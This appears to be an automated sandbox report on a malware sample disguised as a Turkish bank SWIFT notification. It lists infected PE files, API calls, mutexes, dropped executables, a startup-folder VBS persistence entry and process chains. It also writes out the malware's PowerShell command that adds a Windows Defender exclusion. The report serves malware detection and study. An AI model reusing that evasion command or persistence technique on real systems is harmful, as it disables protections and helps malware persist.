Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: armsvc.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: alg.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: niellist.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AppVClient.exe.0.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: officesvcmgr.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3Help.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AutoIt3_x64.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SciTE.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AdobeARMHelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jaureg.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jucheck.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jusched.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevated_tracing_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrmstp.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: os_update_handler.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: chrome_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: crashreporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: default-browser-agent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: firefox.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: updater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: maintenanceservice.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jabswitch.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java-rmi.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: java.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javacpl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaw.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: javaws.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jjs.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: jp2launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: keytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: kinit.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: elevation_service.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7z.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zFM.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: 7zG.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: klist.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ktab.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: orbd.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: policytool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmid.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: rmiregistry.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: servertool.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ssvagent.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: tnameserv.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: Acrobat.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcrobatInfo.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: acrobat_sl.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroBroker.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: unpack200.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: ie_to_edge_stub.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: cookie_exporter.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: identity_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: setup.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedgewebview2.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_proxy.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: msedge_pwa_launcher.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: notification_click_helper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: pwahelper.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: AcroCEF.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: SingleClientServicesUpdater.exe0.2.dr	Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: classification engine

Classification label: mal100.spre.troj.expl.evad.winEXE@38/165@55/19

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046A06A GetLastError,FormatMessageW,

0_2_0046A06A

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004581CB AdjustTokenPrivileges,CloseHandle,		0_2_004581CB
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Code function: 0_2_004587E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_004587E1

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0046B333

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0047EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

0_2_0047EE0D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_0046C397 CoInitialize,CoCreateInstance,CoUninitialize,

0_2_0046C397

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00404E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_00404E89

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Code function: 0_2_00AFCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,

0_2_00AFCBD0

Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe

File created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.log

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Roaming\a8259331cca430bb.bin

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7960:120:WilError_03
Source: C:\Users\user\AppData\Roaming\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\alg.exe	Mutant created: \BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb9ea72c54-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7392:120:WilError_03
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb-inf
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-a8259331cca430bb7d8e3ee9-b
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7476:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\XoFHv1TT4hWErxRo

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File created: C:\Users\user\AppData\Local\Temp\aut9353.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Virustotal: Detection: 79%
Source: Ziraat_Bankasi_Swift-Messaji_Notifications.exe	ReversingLabs: Detection: 86%

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

File read: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: unknown	Process created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
Source: unknown	Process created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Users\user\AppData\Local\differences\niellist.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\Ziraat_Bankasi_Swift-Messaji_Notifications.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process created: C:\Users\user\AppData\Local\Temp\XClient.exe "C:\Users\user\AppData\Local\Temp\XClient.exe"
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
Source: unknown	Process created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
Source: C:\Users\user\AppData\Local\Temp\XClient.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\XClient.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\niellist.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\differences\niellist.exe "C:\Users\user\AppData\Local\differences\niellist.exe"
